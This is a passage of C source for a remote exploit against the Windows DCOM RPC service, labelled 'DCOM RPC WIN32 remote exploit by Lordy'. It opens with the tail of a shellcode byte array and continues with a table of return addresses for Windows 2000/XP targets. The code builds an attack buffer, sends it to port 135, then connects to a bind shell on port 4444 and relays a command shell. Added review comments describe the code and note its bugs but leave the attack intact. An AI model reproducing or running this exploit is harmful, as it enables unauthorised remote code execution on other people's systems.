0xeb,0x05,0xe8,0xe2,0xff,0xff,0xff,0x03,
0x53,0x06,0x1f,0x74,0x57,0x75,0x95,0x80,
0xbf,0xbb,0x92,0x7f,0x89,0x5a,0x1a,0xce,
0xb1,0xde,0x7c,0xe1,0xbe,0x32,0x94,0x09,
0xf9,0x3a,0x6b,0xb6,0xd7,0x9f,0x4d,0x85,
0x71,0xda,0xc6,0x81,0xbf,0x32,0x1d,0xc6,
0xb3,0x5a,0xf8,0xec,0xbf,0x32,0xfc,0xb3,
0x8d,0x1c,0xf0,0xe8,0xc8,0x41,0xa6,0xdf,
0xeb,0xcd,0xc2,0x88,0x36,0x74,0x90,0x7f,
0x89,0x5a,0xe6,0x7e,0x0c,0x24,0x7c,0xad,
0xbe,0x32,0x94,0x09,0xf9,0x22,0x6b,0xb6,
0xd7,0x4c,0x4c,0x62,0xcc,0xda,0x8a,0x81,
0xbf,0x32,0x1d,0xc6,0xab,0xcd,0xe2,0x84,
0xd7,0xf9,0x79,0x7c,0x84,0xda,0x9a,0x81,
0xbf,0x32,0x1d,0xc6,0xa7,0xcd,0xe2,0x84,
0xd7,0xeb,0x9d,0x75,0x12,0xda,0x6a,0x80,
0xbf,0x32,0x1d,0xc6,0xa3,0xcd,0xe2,0x84,
0xd7,0x96,0x8e,0xf0,0x78,0xda,0x7a,0x80,
0xbf,0x32,0x1d,0xc6,0x9f,0xcd,0xe2,0x84,
0xd7,0x96,0x39,0xae,0x56,0xda,0x4a,0x80,
0xbf,0x32,0x1d,0xc6,0x9b,0xcd,0xe2,0x84,
0xd7,0xd7,0xdd,0x06,0xf6,0xda,0x5a,0x80,
0xbf,0x32,0x1d,0xc6,0x97,0xcd,0xe2,0x84,
0xd7,0xd5,0xed,0x46,0xc6,0xda,0x2a,0x80,
0xbf,0x32,0x1d,0xc6,0x93,0x01,0x6b,0x01,
0x53,0xa2,0x95,0x80,0xbf,0x66,0xfc,0x81,
0xbe,0x32,0x94,0x7f,0xe9,0x2a,0xc4,0xd0,
0xef,0x62,0xd4,0xd0,0xff,0x62,0x6b,0xd6,
0xa3,0xb9,0x4c,0xd7,0xe8,0x5a,0x96,0x80,
0xae,0x6e,0x1f,0x4c,0xd5,0x24,0xc5,0xd3,
0x40,0x64,0xb4,0xd7,0xec,0xcd,0xc2,0xa4,
0xe8,0x63,0xc7,0x7f,0xe9,0x1a,0x1f,0x50,
0xd7,0x57,0xec,0xe5,0xbf,0x5a,0xf7,0xed,
0xdb,0x1c,0x1d,0xe6,0x8f,0xb1,0x78,0xd4,
0x32,0x0e,0xb0,0xb3,0x7f,0x01,0x5d,0x03,
0x7e,0x27,0x3f,0x62,0x42,0xf4,0xd0,0xa4,
0xaf,0x76,0x6a,0xc4,0x9b,0x0f,0x1d,0xd4,
0x9b,0x7a,0x1d,0xd4,0x9b,0x7e,0x1d,0xd4,
0x9b,0x62,0x19,0xc4,0x9b,0x22,0xc0,0xd0,
0xee,0x63,0xc5,0xea,0xbe,0x63,0xc5,0x7f,
0xc9,0x02,0xc5,0x7f,0xe9,0x22,0x1f,0x4c,
0xd5,0xcd,0x6b,0xb1,0x40,0x64,0x98,0x0b,
0x77,0x65,0x6b,0xd6,0x93,0xcd,0xc2,0x94,
0xea,0x64,0xf0,0x21,0x8f,0x32,0x94,0x80,
0x3a,0xf2,0xec,0x8c,0x34,0x72,0x98,0x0b,
0xcf,0x2e,0x39,0x0b,0xd7,0x3a,0x7f,0x89,
0x34,0x72,0xa0,0x0b,0x17,0x8a,0x94,0x80,
0xbf,0xb9,0x51,0xde,0xe2,0xf0,0x90,0x80,
0xec,0x67,0xc2,0xd7,0x34,0x5e,0xb0,0x98,
0x34,0x77,0xa8,0x0b,0xeb,0x37,0xec,0x83,
0x6a,0xb9,0xde,0x98,0x34,0x68,0xb4,0x83,
0x62,0xd1,0xa6,0xc9,0x34,0x06,0x1f,0x83,
0x4a,0x01,0x6b,0x7c,0x8c,0xf2,0x38,0xba,
0x7b,0x46,0x93,0x41,0x70,0x3f,0x97,0x78,
0x54,0xc0,0xaf,0xfc,0x9b,0x26,0xe1,0x61,
0x34,0x68,0xb0,0x83,0x62,0x54,0x1f,0x8c,
0xf4,0xb9,0xce,0x9c,0xbc,0xef,0x1f,0x84,
0x34,0x31,0x51,0x6b,0xbd,0x01,0x54,0x0b,
0x6a,0x6d,0xca,0xdd,0xe4,0xf0,0x90,0x80,
0x2f,0xa2,0x04,0x00
};
/* One row of the target table __pt_pkg_form defined below. */
struct os_plat_pk
{
int op_pk_num;          /* selector shown by pri_usg(); 0x82 marks the terminating row */
char *op_pk_str;        /* human-readable name printed by pri_usg() and main() */
u_long retloc_jmp_esp;  /* 32-bit value that main() copies into the shellcode array at offset 36 */
};
/*
 * Target table, terminated by the row whose op_pk_num is 0x82.
 * main() indexes it directly with the -t value: values above 6 are rejected,
 * but a negative value is not, and atoi() maps non-numeric input to row 0.
 * NOTE(review): identifiers starting with a double underscore are reserved
 * for the implementation in ISO C; the name is kept for compatibility with
 * the rest of the file.
 */
struct os_plat_pk __pt_pkg_form[]=
{
{0,"Windows 2000 magic version 1",0x0018759F},
{1,"Windows 2000 magic version 2",0x001875E3},
{2,"Windows 2000 magic version 3",0x001F0CD0},
{3,"Windows 2000 magic version 4",0x010016C6},
{4,"Windows 2000 magic version 5",0x010016CB},
{5,"[Win2k Universal]", 0x0018759F },
{6,"[WinXP Universal]", 0x0100139d },
{0x82,NULL,0}   /* terminator: pri_usg() stops here */
};
#define DEF_STR "It's test"   /* sentinel initial value of def_host in main(); still present => -h was never given */
#define DEF_BF (0x1000)       /* size of the receive buffer and the assembled request buffer in main() */
#define DEF_SZ (0xff)         /* size of the hostname buffer in main() */
#define GET_SZ (0x400)        /* not referenced anywhere in the visible part of this file */
/* Forward declarations; definitions follow main(). pri_usg() and re_connt_lm()
 * (on failure) terminate the process instead of returning. */
int sexsock(char *conn_host_nm,int conn_port_nm);
void start_shell(int st_sock_va);
void re_connt_lm(int st_sock_va);
void pri_usg(char *f_nm);
void pri_banrl();   /* old-style () rather than (void) */
/*
 * Entry point. Parses the command line, assembles a request buffer from the
 * file-scope arrays request1..request4, bindstr and shellcode (declared
 * earlier in the file — only the tail of one array is visible above struct
 * os_plat_pk), sends it to def_host:port_connect, then connects to
 * def_host:port_back and hands that socket to start_shell(). Every path
 * ends in exit(): directly, via pri_usg(), or via re_connt_lm() after a
 * failed connection.
 *
 * Defensive reading: the visible code makes two outbound TCP connections to
 * the same host, first to port_connect (default 135) and then to port_back
 * (default 4444); nothing in the visible code listens locally.
 */
int main(int argc, char *argv[])
{
/* type_def: index into __pt_pkg_form (defaults to row 0);
 * r_r1: bytes assembled so far in atk_bf; r_r2: value added by QIK_SHIFT;
 * whgl: current getopt() result. */
int sock,type_def=(0),r_r1,r_r2,whgl;
u_long retloc_jmp_esp=(__pt_pkg_form[type_def].retloc_jmp_esp);
/* get_bf only receives the reply to bindstr; atk_bf holds the assembled
 * request. Neither is zeroed, and nothing below checks that the assembled
 * length stays within DEF_BF — the array sizes it depends on are outside
 * this view. */
u_char get_bf[(DEF_BF)],atk_bf[(DEF_BF)];
/* Seeded with the DEF_STR sentinel so an omitted -h is detected after parsing. */
char def_host[(DEF_SZ)]=(DEF_STR);
//Lordy UP
unsigned short port_connect = 135;
unsigned short port_back = 4444;
(void)pri_banrl();
/* "I:" declares -I with an argument while "i" takes none; both only print usage. */
while((whgl=getopt(argc,argv,"T:t:H:h:P:p:B:b:I:i"))!=EOF)
{
switch(whgl)
{
case 'T':
case 't':
/* NOTE(review): only the upper bound is checked. atoi() yields 0 for
 * non-numeric input (silently selecting row 0), and a negative value is
 * accepted and then used as an index before the start of __pt_pkg_form. */
if((type_def=atoi(optarg))>6)
{
(void)pri_usg(argv[0]);
}
else retloc_jmp_esp=(__pt_pkg_form[type_def].retloc_jmp_esp);
break;
case 'H':
case 'h':
/* memset() plus a sizeof-1 copy keeps the buffer NUL-terminated. */
memset((char *)def_host,0,sizeof(def_host));
strncpy(def_host,optarg,sizeof(def_host)-1);
break;
case 'P':
case 'p':
port_connect=atoi(optarg);   /* truncated to unsigned short; no range check */
break;
case 'B':
case 'b':
port_back=atoi(optarg);      /* truncated to unsigned short; no range check */
break;
case 'I':
case 'i':
(void)pri_usg(argv[0]);
break;
case '?':
(void)pri_usg(argv[0]);
break;
}
}
/* Sentinel still present => no host given; pri_usg() prints help and exits. */
if(strstr(def_host,(DEF_STR)))
{
(void)pri_usg(argv[0]);
}
fprintf(stdout," [*] Target: %s.\n",__pt_pkg_form[type_def].op_pk_str);
fprintf(stdout," [0] Add return address.\n");
/* Writes the 4-byte table value for the chosen row into the file-scope
 * shellcode array at offset 36 (the array is modified in place). */
memcpy((u_char *)shellcode+36,(u_char *)&retloc_jmp_esp,4);
fprintf(stdout," [1] Start, shellcode setting.\n");
memcpy((u_char *)atk_bf,request1,sizeof(request1));
r_r1=sizeof(request1);
r_r2=sizeof(shellcode)/2;
/* Adds l to the 32-bit value stored at byte offset x of buffer v.
 * It reads and writes a u_long through a u_char array: unaligned access and
 * strict-aliasing violations in ISO C, tolerated here on x86. The arguments
 * are not parenthesised, and the macro stays defined for the rest of the
 * translation unit. */
#define QIK_SHIFT(v,x,l) *(u_long *)(v+x)=*(u_long *)(v+x)+l
/* Adjusts two fields of the file-scope request2 array in place (presumably
 * size fields — their meaning is not visible in this listing). */
QIK_SHIFT(request2,0,r_r2);
QIK_SHIFT(request2,8,r_r2);
/* Append request2, shellcode, request3 and request4; r_r1 tracks the total length. */
memcpy((u_char *)atk_bf+r_r1,request2,sizeof(request2));
r_r1+=sizeof(request2);
memcpy((u_char *)atk_bf+r_r1,shellcode,sizeof(shellcode));
r_r1+=sizeof(shellcode);
memcpy((u_char *)atk_bf+r_r1,request3,sizeof(request3));
r_r1+=sizeof(request3);
memcpy((u_char *)atk_bf+r_r1,request4,sizeof(request4));
r_r1+=sizeof(request4);
/* Second pass: fixed byte offsets inside the assembled buffer. They are only
 * meaningful if request1..request4 have exactly the sizes this file was
 * written against; nothing verifies that here. */
r_r2=sizeof(shellcode)-12;
QIK_SHIFT(atk_bf,8,r_r2);
QIK_SHIFT(atk_bf,16,r_r2);
QIK_SHIFT(atk_bf,128,r_r2);
QIK_SHIFT(atk_bf,132,r_r2);
QIK_SHIFT(atk_bf,180,r_r2);
QIK_SHIFT(atk_bf,184,r_r2);
QIK_SHIFT(atk_bf,208,r_r2);
QIK_SHIFT(atk_bf,396,r_r2);
fprintf(stdout," [2] Trying %s:%i ...\n",def_host,port_connect);
sock=(int)sexsock(def_host,port_connect);
(void)re_connt_lm(sock);   /* terminates the process if sexsock() returned -1 */
fprintf(stdout," [3] Connected to %s:%i.\n",def_host,port_connect);
/* NOTE(review): the return values of send()/recv() are ignored, so a short
 * send or a failed/empty reply goes unnoticed; get_bf is never inspected. */
send(sock,bindstr,sizeof(bindstr),0);
recv(sock,get_bf,sizeof(get_bf),0);
fprintf(stdout," [4] Send, attack code.\n");
send(sock,atk_bf,r_r1,0);
close(sock);   /* POSIX close() on a Winsock handle — presumably mapped to closesocket() elsewhere; confirm */
fprintf(stdout," [5] OK, Trying %s:%i ...\n",def_host,port_back);
fprintf(stdout," [*] Waiting, cmd shell ");
fflush(stdout);
/* Progress dots. Sleep() takes milliseconds on Win32, so each pause is
 * about 1 ms unless Sleep is redefined elsewhere in the file. */
Sleep(1);
fprintf(stdout,".");
fflush(stdout);
Sleep(1);
fprintf(stdout,".");
fflush(stdout);
Sleep(1);
fprintf(stdout,".\n");
/* Second connection, to port_back; re_connt_lm() exits on failure. */
sock=(int)sexsock(def_host,port_back);
(void)re_connt_lm(sock);
(void)start_shell(sock);   /* returns only when the relay ends */
exit(0);
}
/*
 * Opens a TCP connection to conn_host_nm:conn_port_nm.
 * Returns the connected socket, or -1 if Winsock initialisation, socket()
 * or connect() fails (a message is printed before each failure return).
 *
 * Win32-specific: WSAStartup() runs on every call (main() calls this twice)
 * and WSACleanup() is only invoked on the startup-failure path.
 * gimmeip() and bzero() are not in this listing — presumably defined earlier
 * in the file; gimmeip() is assumed to return the address already in network
 * byte order, since its result is stored straight into s_addr (confirm).
 */
int sexsock(char *conn_host_nm,int conn_port_nm)
{
WSADATA wsdata;
int sock;
unsigned long ip;
struct sockaddr_in sxp_addr;   /* sin_zero cleared below; the other fields are set explicitly */
if (WSAStartup(MAKEWORD(2,0),&wsdata)!=0) {
printf("[x] WSAStartup error...\n");
WSACleanup();
return(-1);
}
//printf("[+] Initialize WSAStartup - OK\n");
/* Winsock's INVALID_SOCKET is (SOCKET)~0, which compares equal to -1 once
 * stored in an int. perror() prints errno, which Winsock calls generally do
 * not set, so the message text is likely generic; WSAGetLastError() would
 * hold the real code. */
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
{
perror(" [-] socket() error");
return(-1);
}
//printf("[*] Socket initialized - OK\n");
ip=gimmeip(conn_host_nm);
sxp_addr.sin_family=AF_INET;
sxp_addr.sin_port=htons((SHORT)conn_port_nm);   /* conn_port_nm truncated to 16 bits */
sxp_addr.sin_addr.s_addr=ip;
bzero(&(sxp_addr.sin_zero),8);
/* NOTE(review): on connect() failure the socket is not closed before
 * returning, so each failed attempt leaks a descriptor. */
if(connect(sock,(struct sockaddr *)&sxp_addr,sizeof(struct sockaddr))==-1)
{
perror(" [-] connect() error");
return(-1);
}
return(sock);
}
/*
 * Relays data between local stdin/stdout and the socket until either side
 * reports an error or end-of-stream.
 *
 * Each iteration waits up to RECVTIMEOUT seconds (RECVTIMEOUT is not defined
 * in this listing) for the socket to become readable. If it does, up to
 * sizeof(buf) bytes are received and written to fd 1; otherwise (timeout or
 * select() error) the loop blocks in read() on fd 0 and sends what arrives.
 * Returns after printing "Connection closed." when recv/write/read/send
 * return 0 or an error — the same message covers all four cases, including
 * a local write failure. buf is never NUL-terminated; lengths travel in l.
 *
 * sock: connected socket obtained from sexsock().
 */
void start_shell(int sock){
int l;
char buf[1000];
struct timeval time;   /* shadows time() from <time.h> if that header is included */
unsigned long ul[2];   /* hand-built single-entry fd_set, see the loop */
time.tv_sec=RECVTIMEOUT;
time.tv_usec=0;
while (1) {
/* ul[0] is the entry count and ul[1] the socket; casting this to fd_set*
 * relies on Winsock's {u_int fd_count; SOCKET fd_array[]} layout and on
 * SOCKET being the same width as unsigned long. Not portable. The first
 * select() argument is ignored on Winsock. */
ul[0]=1;
ul[1]=sock;
l=select(0,(fd_set *)&ul,NULL,NULL,&time);
if(l==1) {
l=recv(sock,buf,sizeof(buf),0);
if (l<=0) {
printf("[x] Connection closed.\n");
return;
}
l=write(1,buf,l);
if (l<=0) {
printf("[x] Connection closed.\n");
return;
}
}
else {
/* Timeout or select() error: block on local input. Socket data arriving
 * while read() is blocked is not seen until the read completes. */
l=read(0,buf,sizeof(buf));
if (l<=0) {
printf("[x] Connection closed.\n");
return;
}
l=send(sock,buf,l,0);
if (l<=0) {
printf("[x] Connection closed.\n");
return;
}
}
}
}
/*
 * Terminates the process when the value passed in is -1 (the failure value
 * sexsock() returns); any other value is accepted silently.
 *
 * st_sock_va: socket descriptor to check.
 */
void re_connt_lm(int st_sock_va)
{
if(st_sock_va!=-1)
return;
fprintf(stdout," [-] Failed.\n\n");
fprintf(stdout," Happy Exploit ! :-)\n\n");
exit(-1);
}
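/*
 * Prints the usage text and the rows of __pt_pkg_form to stdout, then
 * terminates the process with exit(0); it never returns to the caller.
 *
 * f_nm: program name (argv[0]) shown in the usage and example lines.
 */
void pri_usg(char *f_nm)
{
fprintf(stdout," Usage: %s -option [argument]\n\n",f_nm);
fprintf(stdout,"\t -h [hostname] - target host.\n");
fprintf(stdout,"\t -p [port to connect] - port to connect in the target, default 135.\n");
fprintf(stdout,"\t -b [port to connect back] - port to bind the shell, default 4444.\n");
fprintf(stdout,"\t -t [number] - select target number.\n\n");
fprintf(stdout," Select target number>\n\n");
/* Walk the table up to, but not including, the 0x82 terminator row. */
for(int r_rn=0;__pt_pkg_form[r_rn].op_pk_num!=(0x82);r_rn++)
{
fprintf(stdout,"\t {%d} %s\n",__pt_pkg_form[r_rn].op_pk_num,__pt_pkg_form[r_rn].op_pk_str);
}
/* Fixed the user-visible typo "Exmaple". */
fprintf(stdout,"\n Example> %s -h 192.168.0.1 -t3 -p135 -b3333\n\n",f_nm);
exit(0);
}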
/* Writes the program banner to stdout. No arguments, no return value. */
void pri_banrl()
{
static const char banner[]=
"\n DCOM RPC WIN32 remote exploit by Lordy - Lordillusions Company(C)\n(Most languages)\n\n";
fputs(banner,stdout);
}
/* eox */